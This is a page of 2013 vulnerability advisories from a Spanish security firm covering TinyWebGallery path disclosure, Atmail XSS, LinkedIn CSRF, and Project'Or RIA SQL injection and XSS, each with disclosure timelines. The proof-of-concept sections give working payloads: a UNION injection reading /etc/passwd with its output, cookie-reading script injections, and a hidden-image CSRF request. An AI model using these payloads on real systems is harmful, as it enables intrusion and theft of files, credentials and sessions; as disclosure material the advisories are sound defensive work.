Internet Security Auditors is a Spain based leader in web application testing, network security, penetration testing, security compliance implementation and assessing. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ITC, etc. We are vendor independent provider with a deep expertise since 2001. Our efforts in R&D include vulnerability research, open security project collaboration and whitepapers, presentations and security events participation and promotion. For further information regarding our security services, contact us.

Volver al inicio

2013-012: Multiple Full Path Disclosure Vulnerabilities in TinyWebGallery <= v1.8.9

Original release date: March 19th, 2013
Last revised: April 6th, 2013
Discovered by: Manuel Garcia Cardenas
Severity: 5/10 (CVSS Base Score)
CVE-ID: CVE-2013-2631

BACKGROUND

TinyWebGallery (TWG) is a photo album / gallery released under a modified Open Source license GPL. It is a server based gallery script for images which uses Ajax, PHP, XML and the graphic library Gdlib / ImageMagick.

DESCRIPTION

This vulnerability could allow a malicious user to view the internal path information of the host due to some files were missing the check the inclusion of libraries.
The error is generated through the parameters "twg_browserx" and "twg_browsery" in the page image.php.

PROOF OF CONCEPT

The attacker can get the full path of the installation of TinyWebGallery browsing to any of this urls:

 http://vulnerablesite.com/tw/image.php?fontscale=1&twg_browserx[]=1706&twg_browsery=890&twg_xmlhttp=r
http://vulnerablesite.com/tw/image.php?fontscale=1&twg_browserx=1706&twg_browsery[]=890&twg_xmlhttp=r

The information obtained contains the full path to the files:

Fatal error: Unsupported operand types in /var/www/tw/inc/ajaxserver.inc.php on line 157

BUSINESS IMPACT

Full path disclosure vulnerabilities enables an attacker to know the path to the web root. This information can be used in order to launch further attacks.

SYSTEMS AFFECTED

TinyWebGallery <=1.8.9

SOLUTION

Update to version 1.9

REFERENCES

http://www.tinywebgallery.com
http://www.isecauditors.com

CREDITS

This vulnerability has been discovered by Manuel Garcia Cardenas (mgarcia (at) isecauditors (dot) com).

REVISION HISTORY

March 19, 2013: Initial release.

April 6, 2013: Final release.

DISCLOSURE TIMELINE

March 19, 2013: Vulnerability acquired by Internet Security Auditors (www.isecauditors.com)

March 21, 2013: Send to Vendor.
March 21, 2013: New version that includes patched code.
April 6, 2013: Sent to lists.

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.

ABOUT

Internet Security Auditors is a Spain based leader in web application testing, network security, penetration testing, security compliance implementation and assessing. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ITC, etc. We are vendor independent provider with a deep expertise since 2001. Our efforts in R&D include vulnerability research, open security project collaboration and whitepapers, presentations and security events participation and promotion. For further information regarding our security services, contact us.

Volver al inicio

2013-014: Multiple reflected XSS vulnerabilities in Atmail WebMail.

Original release date: March 25th, 2013
Last revised: March 25th, 2013
Discovered by: Vicente Aguilera Diaz
Severity: 4.3/10 (CVSSv2 Base Scored)
CVE-ID: CVE-2013-6229

BACKGROUND

Atmail allows users to access IMAP Mailboxes of any server of your choice. The software provides a comprehensive email-suite for accessing user mailboxes, and provides an inbuilt Calendar and Addressbook features. The WebMail Client of Atmail supports any existing IMAP server running under Unix/Linux or Windows systems.

DESCRIPTION

Has been detected multiple reflected XSS vulnerability:
1) in the view attachment message process
2) in the search message with filter process
3) in the delete message process
These vulnerabilities allows the execution of arbitrary HTML/script code to be executed in the context of the victim user's browser.

PROOF OF CONCEPT

                      1) View attachment message process
                       When a user opens a file attachment in an email, the link is as follows:

                             http://<atmail-server>/index.php/mail/viewmessage/getattachment/folder/INBOX/uniqueId/<ID>/filenameOriginal/<file>

                      where:
                           -  is the Atmail WebMail server
                           -  is the unique ID for the message that contains the attachment
                           -  is the attachment file in the message

                      A malicious user can inject arbitrary HTML/script code in the  parameter. For example:
                           http://<atmail-server>/index.php/mail/viewmessage/getattachment/folder/INBOX/uniqueId/<ID>/filenameOriginal/test.txt
                           <H1><marquee>This+is+an+XSS+example


                     2) Search message with filter process
                    When a user search messages with a filter (for example, using the "Friends" filter), the link is as follows:

                         POST

                              /index.php/mail/mail/listfoldermessages/searching/true/selectFolder/INBOX/resultContext/searchRes

                             ultsTab5 HTTP/1.1
                             Host: <atmail-server>
                             ...
                             searchQuery=&goBack=6&from=&to=&subject=&body=&filter=<filter>

                    where:
                      -  is the Atmail WebMail server
                      -  is the name of the selected filter by the user

                   A malicious user can inject arbitrary HTML/script code in the  parameter. Also, This POST HTTP Request can become a GET HTTP Request, making it easier to exploit
the vulnerability.
                    For example:

                          http://<atmail-server>/index.php/mail/mail/listfoldermessages/searching/true/selectFolder/INBOX/resultContext/searchResultsTab5?searchQuery=&goBack=6&from=&to=&subject=&body=&filter=friends<H1><marquee>This +is+an+XSS+example


                   3) Delete message process When a user select and delete a message, the link is as follows:

                          POST
                               /index.php/mail/mail/movetofolder/fromFolder/INBOX/toFolder/INBOX.Trash
                               HTTP/1.1Host:

                               <atmail-server>
                               ...
                                    resultContext=messageList&listFolder=INBOX&pageNumber=1&unseen%5B21%5D=0&mailId%5B

                                    %5D=<MailID>&unseen%5B20%5D=0&unseen%5B16%5D=0&unseen%5B15%5D=0&unseen%5B14%5D=0&unseen

                                    %5B12%5D=0&unseen%5B11%5D=0&unseen%5B10%5D=0&unseen%5B9%5D=0&unseen%5B8%5D=0&unseen

                                    %5B6%5D=0&unseen%5B5%5D=0&unseen%5B4%5D=0&unseen%5B3%5D=0&unseen%5B2%5D=0&unseen%5B1%5D=0

                      where:
                                -  is the Atmail WebMail server
                                -  is the identifier (number) of the mail selected by the user

                     A malicious user can inject arbitrary HTML/script code in the  parameter. Also, This POST HTTP Request can become a GET HTTP Request, making it easier to exploit the vulnerability.
                     For example:

                              http://<atmail-server>/index.php/mail/mail/movetofolder/fromFolder/INBOX/toFolder/INBOX.Trash?

                              resultContext=messageList&listFolder=INBOX&pageNumber=1&unseen%5B21%5D=0&mailId%5B

                              %5D=<H1><marquee>This+is+an+XSS+example&unseen%5B20%5D=0&unseen%5B16%5D=0&unseen

                              %5B15%5D=0&unseen%5B14%5D=0&unseen%5B12%5D=0&unseen%5B11%5D=0&unseen%5B10%5D=0&unseen

                              %5B9%5D=0&unseen%5B8%5D=0&unseen%5B6%5D=0&unseen%5B5%5D=0&unseen%5B4%5D=0&unseen%5B3%5D=0&unseen

                              %5B2%5D=0&unseen%5B1%5D=0

BUSINESS IMPACT

An attacker can execute arbitrary HTML or script code in a targeted user's browser, this can leverage to steal sensitive information as user credentials, personal data, etc.

SYSTEMS AFFECTED

Tested in Atmail 7.0.2. Other versions may be affected too.

SOLUTION

-

REFERENCES

http://www.atmail.com
http://www.isecauditors.com

CREDITS

This vulnerability has been discovered by Vicente Aguilera Diaz (vaguilera (at) isecauditors (dot) com).

REVISION HISTORY

March 9, 2013: Initial release
March 22, 2013: Last revision

DISCLOSURE TIMELINE

March 9, 2013: Discovered by Internet Security Auditors
March 22, 2013: Advisory updated with new XSS vulnerable resources
October 08, 2013: Firt contact with developer team
October 16, 2013: Second contact with developer team
November 28, 2013: Third contact with developer team
January 10, 2014: Last contact and release

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.

ABOUT

Internet Security Auditors is a Spain based leader in web application testing, network security, penetration testing, security compliance implementation and assessing. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ITC, etc. We are vendor independent provider with a deep expertise since 2001. Our efforts in R&D include vulnerability research, open security project collaboration and whitepapers, presentations and security events participation and promotion. For further information regarding our security services, contact us.

Volver al inicio

2013-016: CSRF vulnerability in LinkedIn

Original release date: June 8th, 2013
Last revised: July 11th, 2013
Discovered by: Eduardo Garcia Melia
Severity: 4.3/10 (CVSSv2 Base Score)

BACKGROUND

LinkedIn is a social networking service and website (www.linkedin.com) for professionals. The site officially launched on May 5, 2003. As of September 30, 2012 (the end of the third quarter), professionals are signing up to join LinkedIn at a rate of approximately two new members per second. Actually, Over 175 million professionals use LinkedIn to exchange information, ideas and opportunities.

DESCRIPTION

CSRF (Cross-site Request Forgery) is an attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated. With a little help of social engineering (like sending a link via email/chat), an attacker may force the users of a web application to execute actions of the attacker's choosing. A successful CSRF exploit can compromise end user data and operation in case of normal user. If the targeted end user is the administrator account, this can compromise the entire web application.

More info about CSRF:
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)

LinkedIn is vulnerable to CSRF attacks in the "Join Groups" functionality. The only token for authenticate the user is a session cookie, and this cookie is sent automatically by the browser in every request.
LinkedIn Groups provide a place for professionals in the same industry or with similar interests to share content, find answers, post and view jobs, make business contacts, and establish themselves as industry experts.
An attacker can create a page that includes requests to the "Join Group" functionality of LinkedIn and add to his group the users who, being authenticated, visit the page of the attacker.
The attack is facilitated since the "Join Group" request can be realized across the HTTP GET method instead of the POST method that is realized habitually across the "Join Group" button.

PROOF OF CONCEPT

Next, we show a typical request to the "Join Group" functionality:

POST /nhome/nux/group HTTP/1.1
Host: www.linkedin.com
...

grpId=<groupid>trk=nux-group-join

Also, We can use HTTP GET method instead the HTTP POST method used at
this request. This makes it more easy the exploitation of the CSRF vulnerability. So, finally, this
HTTP request provoke the

same result that the original HTTP POST request:

GET /nhome/nux/group?grpId=<groupid>&trk=nux-group-join HTTP/1.1
Host: www.linkedin.com
...

1. An attacker create a web page "csrf-exploit.html" that realize a HTTP
GET request to the "Join Group" functionality.

For example:
...
<img height="0" src="http://www.linkedin.com/nhome/nux/group?grpId=<GROUPID>&trk=nux-group-join" width="0" />
...

2. A user authenticated in LinkedIn visit the "csrf-exploit.html" page
controlled by the attacker.

For example, the attacker sends a mail to the victim (through the
messaging system that provides LinkedIn is better as it ensures that the victim user is authenticated)
and provokes that the victim visits his page (using social engineering techniques).

3. The attacker receives an invitation request from the victim user, so
the attacker just accept this invitation and the user is added to his group.
</groupid></groupid>

BUSINESS IMPACT

A malicious user can make the victims send a petition for join his group without his consent / knowledge.

SYSTEMS AFFECTED

LinkedIn service.

SOLUTION

Pending.

REFERENCES

http://www.linkedin.com
http://www.isecauditors.com

CREDITS

These vulnerabilities have been discovered by Eduardo Garcia Melia (egarcia (at) isecauditors (dot) com).

REVISION HISTORY

June 08, 2013: Initial release
June 11, 2013: New update

DISCLOSURE TIMELINE

June 11, 2013: Vulnerability acquired by Internet Security Auditors.
July 11, 2013: Sent to LinkedIn SecTeam.
August 15, 2013: Vulnerability was solved for LinkedIn SecTeam.
October 17, 2013: Disclosure

LEGAL NOTICES

The information contained within this advisory is supplied &quot;as-is&quot; with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.

ABOUT

Internet Security Auditors is a Spain based leader in web application testing, network security, penetration testing, security compliance implementation and assessing. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ITC, etc. We are vendor independent provider with a deep expertise since 2001. Our efforts in R&D include vulnerability research, open security project collaboration and whitepapers, presentations and security events participation and promotion. For further information regarding our security services, contact us.

Volver al inicio

2013-017: SQL Injection vulnerability in "Project'Or RIA" allow arbitrary access to the database and the file system.

Original release date: July 26th, 2013
Last revised: July 26th, 2013
Discovered by: Vicente Aguilera Diaz
Severity: 6.8/10 (CVSSv2 Base Scored)
CVE-ID: CVE-2013-6164

BACKGROUND

Project'Or RIA is an open source Project Management Software, trying to gather in a single tool every functionality needed to organize your projects.
The objective is to keep it simple, easy to use on a day to day activity, while covering most of the project management functionalities.

DESCRIPTION

Has been detected a SQL Injection vulnerability in the "Affectations" functionality of this application. The affected resource and parameter are the following:

Resource:
/view/objectDetail.php

Parameter:
objectId

This vulnerability allows the execution of arbitrary SQL code against the database, and arbitrary access to the file system.

PROOF OF CONCEPT

When a user access to the "Environmental parameters / Affectations" functionality, is generated a output with a list of resources. If a user access to the de tails of a resource, is generated a request as follows:

 

                          POST /view/objectDetail.php?destinationWidth=1017 HTTP/1.1
                          Host: <projectorria-server>

                          objectClass=Affectation&objectId=000042&listIdFilter=&listFilterClause=
               

where the "objectId" value contains the resource identifier.
A malicious user can inject arbitrary SQL code in the parameters of this request. For example:

                             1. Accessing the file system
                             1.1 /etc/passwd
                             Modified parameter:
                             <objectId>

                              Value: 
                              99942+union+(select+load_file('/etc/passwd'),null,null,null,null,null,null,null,null,null,null,null+from+dual)

                              Request:

                              POST /view/objectDetail.php?destinationWidth=1017 HTTP/1.1
                              Host: <projectorria-server>

                                   objectClass=Affectation&objectId=99942+union+(select+load_file('/etc/passwd'),null,null,null,null,null,null,null,null,null,null,null+from+dual)
                                   &listIdFilter=&listFilterClause=

                             Response:
                             HTTP/1.1 200 OK

                            ...
           
                            <span dojoType="dijit.form.TextBox" type="text"   id="id" name="id" class="display"  readonly tabindex="-1" style="width: 75px;" 

                                          value="root:x:0:0:root:/root:/bin/bash
                                          daemon:x:1:1:daemon:/usr/sbin:/bin/sh
                                          bin:x:2:2:bin:/bin:/bin/sh
                                          sys:x:3:3:sys:/dev:/bin/sh
                                          sync:x:4:65534:sync:/bin:/bin/sync
                                          games:x:5:60:games:/usr/games:/bin/sh
                                          man:x:6:12:man:/var/cache/man:/bin/sh
                                          lp:x:7:7:lp:/var/spool/lpd:/bin/sh
                                          mail:x:8:8:mail:/var/mail:/bin/sh
                                          news:x:9:9:news:/var/spool/news:/bin/sh
                                          uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
                                          proxy:x:13:13:proxy:/bin:/bin/sh
                                          www-data:x:33:33:www-data:/var/www:/bin/sh
                                          backup:x:34:34:backup:/var/backups:/bin/sh
                                          list:x:38:38:Mailing List Manager:/var/list:/bin/sh
                                          irc:x:39:39:ircd:/var/run/ircd:/bin/sh
                                          gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
                                          nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
                                          libuuid:x:100:101::/var/lib/libuuid:/bin/sh
                                          syslog:x:101:103::/home/syslog:/bin/false
                                          whoopsie:x:102:104::/nonexistent:/bin/false
                                          landscape:x:103:105::/var/lib/landscape:/bin/false
                                          messagebus:x:104:108::/var/run/dbus:/bin/false
                                          ntpd:x:105:111::/var/run/openntpd:/bin/false
                                          postfix:x:106:113::/var/spool/postfix:/bin/false
                                          babynus:x:1000:1000::/home/babynus:/bin/bash
                                          bind:x:107:115::/var/cache/bind:/bin/false
                                          sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin
                                          zend:x:109:116::/usr/local/zend/gui/lighttpd/:/bin/false
                                          mysql:x:110:117:MySQL Server,,,:/nonexistent:/bin/false
                                          nagios:x:111:118::/var/lib/nagios:/bin/false
                                          smmta:x:112:119:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
                                          smmsp:x:113:120:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
                                          postgres:x:114:121:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
                         " ></span>
                          ...
            
                                           Obtained info (/etc/passw):
                                           root:x:0:0:root:/root:/bin/bash
                                           daemon:x:1:1:daemon:/usr/sbin:/bin/sh
                                           bin:x:2:2:bin:/bin:/bin/sh
                                           sys:x:3:3:sys:/dev:/bin/sh
                                           sync:x:4:65534:sync:/bin:/bin/sync
                                           games:x:5:60:games:/usr/games:/bin/sh
                                           man:x:6:12:man:/var/cache/man:/bin/sh
                                           lp:x:7:7:lp:/var/spool/lpd:/bin/sh
                                           mail:x:8:8:mail:/var/mail:/bin/sh
                                           news:x:9:9:news:/var/spool/news:/bin/sh
                                           uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
                                           proxy:x:13:13:proxy:/bin:/bin/sh
                                           www-data:x:33:33:www-data:/var/www:/bin/sh
                                           backup:x:34:34:backup:/var/backups:/bin/sh
                                           list:x:38:38:Mailing List Manager:/var/list:/bin/sh
                                           irc:x:39:39:ircd:/var/run/ircd:/bin/sh
                                           gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
                                           nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
                                           libuuid:x:100:101::/var/lib/libuuid:/bin/sh
                                           syslog:x:101:103::/home/syslog:/bin/false
                                           whoopsie:x:102:104::/nonexistent:/bin/false
                                           landscape:x:103:105::/var/lib/landscape:/bin/false
                                           messagebus:x:104:108::/var/run/dbus:/bin/false
                                           ntpd:x:105:111::/var/run/openntpd:/bin/false
                                           postfix:x:106:113::/var/spool/postfix:/bin/false
                                           babynus:x:1000:1000::/home/babynus:/bin/bash
                                           bind:x:107:115::/var/cache/bind:/bin/false
                                           sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin
                                           zend:x:109:116::/usr/local/zend/gui/lighttpd/:/bin/false
                                           mysql:x:110:117:MySQL Server,,,:/nonexistent:/bin/false
                                           nagios:x:111:118::/var/lib/nagios:/bin/false
                                           smmta:x:112:119:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
                                           smmsp:x:113:120:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
                                           postgres:x:114:121:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
                

                           2. Obtaining database private information
                           2.1 Obtaining TABLE_NAME from INFORMATION_sCHEMA.TABLES
                                 Modified parameter:
                                      <objectId>

                                               Value:  
                                                    99942+union+(select+@@version,null,null,null,null,null,null,null,null,null,null,null+from+dual)

                                               Request:

                                                      POST /view/objectDetail.php?destinationWidth=1017 HTTP/1.1
                                                      Host: <projectorria-server>

                                                      objectClass=Affectation&objectId=99942+union+(select+@@version,null,null,null,null,null,null,null,null,null,null,null+from+dual)
                                                      &listIdFilter=&listFilterClause=

                                                       Response:
                                                       HTTP/1.1 200 OK

                                                  <span dojoType="dijit.form.TextBox" type="text"   id="id" name="id" class="display"  readonly tabindex="-1" style="width: 75px;"   value="5.5.24-0ubuntu0.12.04.1" >

                                                      Obtained info (MySQL Version):
                                                      5.5.24-0ubuntu0.12.04.1
                

BUSINESS IMPACT

An attacker can execute arbitrary SQL code and gain access to private information stored in the database or the file system.

SYSTEMS AFFECTED

Tested in Project'Or RIA v3.4.0

SOLUTION

Pending.

REFERENCES

http://projectorria.org
http://www.isecauditors.com

CREDITS

This vulnerability has been discovered by Vicente Aguilera Diaz (vaguilera (at) isecauditors (dot) com).

REVISION HISTORY

July 26, 2013: Initial release

DISCLOSURE TIMELINE

July 25, 2013: Vulnerability acquired by Internet Security Auditors (www.isecauditors.com).
September 26, 2013: Sent to project support.
November 03, 2013: New release and disclosure.

LEGAL NOTICES

The information contained within this advisory is supplied &quot;as-is&quot; with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.

ABOUT

Internet Security Auditors is a Spain based leader in web application testing, network security, penetration testing, security compliance implementation and assessing. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ITC, etc. We are vendor independent provider with a deep expertise since 2001. Our efforts in R&D include vulnerability research, open security project collaboration and whitepapers, presentations and security events participation and promotion. For further information regarding our security services, contact us.

Volver al inicio

2013-018: Multiple XSS vulnerabilities in "Project'Or RIA".

Original release date: July 26th, 2013
Last revised: July 26th, 2013
Discovered by: Vicente Aguilera Diaz
Severity: 4.3/10 (CVSSv2 Base Scored)
CVE-ID: CVE-2013-6163

BACKGROUND

Project'Or RIA is an open source Project Management Software, trying to gather in a single tool every functionality needed to organize your projects.
The objective is to keep it simple, easy to use on a day to day activity, while covering most of the project management functionalities.

DESCRIPTION

Has been detected multiple XSS vulnerability.
The affected resources and parameters are the following:

	Resource 1:
	/view/parameter.php


	Parameter:
	type


	Resource 2:
	/view/main.php


	Parameter:
	p1value


	Resource 3:
	/view/objectDetail.php


	Parameter:
	objectClass

	

These vulnerabilities allows the execution of arbitrary HTML/script code to be executed in the context of the victim user's browser.

PROOF OF CONCEPT

                   A malicious user can inject arbitrary HTML/script code in the affected parameters.

                   Example 1 (GET Request):
                   http://<projectorria-server>/view/parameter.php?type="><H1><marquee>This+is+an+XSS+example<!--

                    Example 2 (GET Request):
                    http://<projectorria-server>/view/main.php?directAccessPage=parameter.php&menuActualStatus=visible&p1name=test&p1value=");alert(document.cookie);

                    Example 3 (POST Request):
                    POST /view/objectDetail.php?destinationWidth=1017 HTTP/1.1
                    Host: <projectorria-server>
                    objectClass=Affectation<H1><marquee>This+is+an+XSS+example<!--&objectId=42&listIdFilter=&listFilterClause=
   
       

BUSINESS IMPACT

An attacker can execute arbitrary HTML or script code in a targeted user's browser, this can leverage to steal sensitive information as user credentials, personal data, etc.

SYSTEMS AFFECTED

Tested in Project'Or RIA v3.4.0

SOLUTION

Install new version.

REFERENCES

http://projectorria.org
http://www.isecauditors.com

CREDITS

This vulnerability has been discovered by Vicente Aguilera Diaz (vaguilera (at) isecauditors (dot) com).

REVISION HISTORY

July 26, 2013: Initial release

DISCLOSURE TIMELINE

July 25, 2013: Vulnerability acquired by Internet Security Auditors (www.isecauditors.com).
September 26, 2013: Sent to project support.
November 03, 2013: New release and disclosure.

LEGAL NOTICES

The information contained within this advisory is supplied &quot;as-is&quot; with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.

ABOUT

Internet Security Auditors is a Spain based leader in web application testing, network security, penetration testing, security compliance implementation and assessing. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ITC, etc. We are vendor independent provider with a deep expertise since 2001. Our efforts in R&D include vulnerability research, open security project collaboration and whitepapers, presentations and security events participation and promotion. For further information regarding our security services, contact us.

Volver al inicio